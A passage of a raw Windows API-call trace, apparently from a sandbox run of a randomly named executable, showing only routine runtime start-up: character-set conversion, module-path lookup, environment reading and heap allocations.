¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0251.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0251.551] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0251.551] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0251.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0251.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0251.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0251.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0251.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0251.551] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0251.552] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1000) returned 0x4170f0 [0251.553] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0251.553] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0251.553] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0251.553] AreFileApisANSI () returned 1 [0251.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0251.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0251.553] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xce) returned 0x404400 [0251.553] GetEnvironmentStringsW () returned 0x418100* [0251.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0251.553] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x4e6) returned 0x418ae0 [0251.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x418ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0251.554] FreeEnvironmentStringsW (penv=0x418100) returned 1 [0251.554] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x118) returned 0x40a350 [0251.554] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1f) returned 0x40b680 [0251.554] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2e) returned 0x404fa0 [0251.554] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x31) returned 0x404fe0 [0251.554] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3c) returned 0x410e50 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x31) returned 0x405020 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x14) returned 0x405060 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x24) returned 0x40b290 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xd) returned 0x403fb0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1d) returned 0x40b4a0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x31) returned 0x403eb0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x15) returned 0x409900 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x17) returned 0x404090 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xe) returned 0x4025f0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x69) returned 0x403ef0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x3e) returned 0x4106d0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1d) returned 0x40b2c0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x48) returned 0x40fff0 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x12) returned 0x403f70 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x18) returned 0x40ba20 [0251.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1b) returned 0x40b710 [0251.770] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1e) returned 0x40b2f0 [0251.770] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x29) returned 0x40ba40 [0251.770] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1e) returned 0x40b500 [0251.770] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x6b) returned 0x40ba80 [0251.770] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x17) returned 0x408d00 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xf) returned 0x408d20 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x16) returned 0x408d40 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2a) returned 0x418210 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x29) returned 0x418550 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x12) returned 0x408d60 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x21) returned 0x40b350 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x16) returned 0x419120 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x22) returned 0x40b3b0 [0251.771] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x12) returned 0x419320 [0251.771] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418ae0 | out: hHeap=0x400000) returned 1 [0251.772] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa3a7) returned 0x4193e0 [0251.774] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x20) returned 0x40b890 [0251.774] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa3a7) returned 0x423790 [0251.775] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.775] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xfef7) returned 0x42db40 [0251.778] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x40) returned 0x410270 [0251.778] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xfef7) returned 0x43da40 [0251.780] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40b890 | out: hHeap=0x400000) returned 1 [0251.780] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x42db40 | out: hHeap=0x400000) returned 1 [0251.781] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x450) returned 0x418910 [0251.782] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x450) returned 0x44d940 [0251.782] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.782] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1ea7) returned 0x44dda0 [0251.782] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xf40) returned 0x4193e0 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x7a0) returned 0x41a330 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44dda0 | out: hHeap=0x400000) returned 1 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xbf0) returned 0x4193e0 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x41a330 | out: hHeap=0x400000) returned 1 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x640) returned 0x418910 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1247) returned 0x44d940 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x520) returned 0x418910 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1b56) returned 0x4193e0 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.783] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.783] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x8a0) returned 0x44d940 [0251.784] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x28ed) returned 0x41af40 [0251.784] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.784] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.784] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x550) returned 0x418910 [0251.784] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.784] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2537) returned 0x44d940 [0251.784] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x12b7) returned 0x4193e0 [0251.784] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x950) returned 0x41d840 [0251.785] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.785] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.785] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x3d4f) returned 0x41e1a0 [0251.785] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x41af40 | out: hHeap=0x400000) returned 1 [0251.785] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x41d840 | out: hHeap=0x400000) returned 1 [0251.785] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2377) returned 0x44d940 [0251.785] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x11d7) returned 0x421f00 [0251.786] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x8e0) returned 0x4193e0 [0251.786] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.786] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x421f00 | out: hHeap=0x400000) returned 1 [0251.786] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.786] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x5b0) returned 0x418910 [0251.786] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.786] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x640) returned 0x418910 [0251.786] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x5be2) returned 0x42db40 [0251.787] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x41e1a0 | out: hHeap=0x400000) returned 1 [0251.787] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x890) returned 0x44d940 [0251.787] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xac0) returned 0x44d940 [0251.787] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x20) returned 0x40b3e0 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x960) returned 0x44d940 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x960) returned 0x44e2b0 [0251.787] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x460) returned 0x418910 [0251.787] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xe0f) returned 0x44ec20 [0251.787] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44e2b0 | out: hHeap=0x400000) returned 1 [0251.788] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.788] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1c17) returned 0x433730 [0251.788] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xe00) returned 0x44d940 [0251.788] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x700) returned 0x435350 [0251.788] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x433730 | out: hHeap=0x400000) returned 1 [0251.788] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.788] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x153d) returned 0x433730 [0251.788] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44ec20 | out: hHeap=0x400000) returned 1 [0251.788] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x435350 | out: hHeap=0x400000) returned 1 [0251.788] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2277) returned 0x44d940 [0251.788] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1157) returned 0x434c80 [0251.789] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x8a0) returned 0x435de0 [0251.789] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 